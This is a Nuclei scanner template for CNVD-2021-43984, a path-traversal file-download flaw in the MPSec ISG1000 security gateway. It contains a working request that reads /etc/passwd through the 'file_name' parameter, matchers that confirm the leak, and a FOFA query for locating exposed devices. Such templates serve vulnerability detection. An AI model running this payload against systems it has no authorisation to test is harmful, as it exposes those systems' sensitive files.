nuclei-templates/http/cnvd/2021/CNVD-2021-43984.yaml

40 lines
1.0 KiB
YAML

id: CNVD-2021-43984
info:
name: MPSec ISG1000 Security Gateway - Arbitrary File Download
author: DhiyaneshDk
severity: high
description: |
The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984
- https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml
metadata:
max-request: 1
verified: true
fofa-query: "迈普通信技术股份有限公司"
tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg
http:
- method: GET
path:
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "text/plain"
- "USGSESSID="
condition: and
- type: status
status:
- 200